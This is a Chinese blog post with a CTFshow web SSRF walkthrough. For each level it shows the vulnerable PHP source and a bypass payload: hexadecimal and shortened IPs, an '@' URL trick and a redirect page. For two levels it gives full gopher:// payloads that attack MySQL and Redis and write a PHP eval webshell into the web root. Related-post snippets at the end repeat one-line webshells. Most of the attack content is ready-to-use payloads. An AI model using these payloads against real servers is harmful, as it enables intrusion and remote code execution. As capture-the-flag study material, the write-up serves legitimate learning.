ctfshow--web入门--SSRF

最新推荐文章于 2024-05-01 09:00:55 发布
最新推荐文章于 2024-05-01 09:00:55 发布
阅读量138 收藏 1
点赞数 1
分类专栏: CTFshow 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74985952/article/details/131617742
版权

ctfshow–web入门–SSRF

这里写目录标题

web351

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

没有进行过滤
payload

url=http://127.0.0.1/flag.php

web352

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

parse_url()函数会解析url中的各个参数
代码中会检测协议是否为http或https,使用正则表达式匹配关键字是否含有localhost或127.0.0
绕过方式:可以使用进制转换的方式将ip地址转换为其他进制进行访问
payload:

url=http://0x7F000001/flag.php		十六进制

web153

同上

web154

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

这里检测的是是否包含1或0,采用进制转换的方式就不能绕过了,可以采用域名解析或短网址绕过或者重定向
这里可以采用域名解析,让域名解析到127.0.0.1,再让服务器访问域名就可以了。

web155

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

这里对地址进行了长度检测,可以采用简写的方式去绕过
payload:

url=http://0/flag.php
url=http://127.1/flag.php

web156

同上

web157

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>

gethostbyname()这里对url对应的ip地址进行了检测,因此不能使用短网址,域名解析等手段了,只能采用重定向的方式,构建一个重定向的网页,跳转至http://127.0.0.1/flag.php即可,然后将文件放入服务器中,去访问它即可
payload:

<?php
header("Location:http://127.0.0.1/flag.php");

web158

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

源码中要求http://ctf.开头,以show结尾才可以进行读取url。
payload:

url=http://ctf.@127.0.0.1/flag.php?show

web159

在这里插入图片描述
题目中提示打无密码的myslq,那么攻击myslq肯定不能用http协议去攻击,这时候需要用到gopher协议进行对mysql的命令执行,使用工具Gopherus去生成payload,由于数据在提交过程中浏览器会对其进行url解码,为了保证服务器接受到的数据与payload一致,需要对带有百分号部分进行二次编码
在这里插入图片描述

payload:

http://a8649415-216a-49c8-8f44-265bc2682d7c.challenge.ctf.show/check.php

u=Username&returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2546%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2578%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2522%2501%2500%2500%2500%2501

最后在check.php页面进行传参
在这里插入图片描述
在这里插入图片描述
最后连接后门在服务器根目录下查看flag即可

web160

这里一样的方法,攻击redis数据库,默认生成的文件名为shell.php,将payload中带有百分号的部分进行二次编码然后进行传参即可。
在这里插入图片描述
payload:

url=gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252429%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255Bx%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

以上内容仅作参考学习,如有瑕疵或错误,希望各位师傅们斧正,感谢阅读。

SuperMan529
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow 文件上传 web158
Kradress的博客
02-15 217
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 发现上题的可以直接用,直接白嫖了 shell.png <?system('tac ../f*')?> 总结 …
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
ctfshow [web] 文件上传 156--160
weixin_68906365的博客
02-18 264
可以在User-Agent处写入php代码,在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传,可以先上传.user.ini 文件然后再上传写有木马的png图片,然后访问/upload页面。可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。过滤了空格,导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件,不过木马上传失败了。看了一眼题解,发现括号被过滤了,需要用反引号执行命令。短标签开启:(配置文件:php.ini)
CTFshow web(文件上传158-161)
csjjjd的博客
02-16 1114
在上传.user.ini文件时,经过检测发现对文件头进行检测,所以在上传所有文件时都要加上图片格式的文件头。不管怎么上传也达不到目的,这里肯定是某个字符串被过滤了 ,使用"."一个个尝试后发现都失败了。接下来还是像之前那般先把user.ini上传,然后再上传一个文件包含,接下来访问upload。只有log进行过滤之后才可以上传成功。接下来很简单,把木马插入ua就好了。
2024年最新CTFshow web(php文件上传155-158)_ctfshow155
最新发布
2401_84302583的博客
05-01 285
web155web156本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1025
CTFshow-文件上传
CTFshow--web入门--文件上传
qq_46874275的博客
04-24 1814
~目录~开始web151 改后缀 / 禁jsweb152 改后缀web153 .user.iniweb154、155 .user.ini + 短标签web156 {}web157、158、159 反引号执行命令web160 日志包含绕过web161 幻术文件头web162、163 session文件包含+条件竞争 开始 挑简单的先来 web151 改后缀 / 禁js 上传一个一句话,要求是图片格式,否则传不上去 <?php @eval($_POST['a']) ?> 然后抓包修改后缀为php
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。...SSRF 未盐化 文件包含 XXE 科学技术研究院
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载它将很快能够测试Json和XML 测试SMTP SSRF如何安装/建造git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
【CTF】文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 4836
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
ctfshow 文件上传 web151~170
shinygod的博客
03-22 1326
目录web151web 152web 153web 154web 155web 156 web151 上传提示,前端验证 上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上,但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php,大小写改一
CTFShow-WEB入门篇文件上传详细Wp(151-170)
Aluxian_的博客
07-16 2016
【代码】CTFShow-WEB入门篇文件上传详细Wp(115-170)
CTFshow Web入门 文件上传
m0_62905261的博客
10-05 770
CTFshow Web入门 文件上传
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 6524
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
ctfshow web入门文件上传
m0_61448651的博客
01-12 632
ctfshow web入门文件上传
ctfshow ssrf
08-16
- *1* [ctfshow-web入门 ssrf篇](https://blog.csdn.net/weixin_45696568/article/details/114434596)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值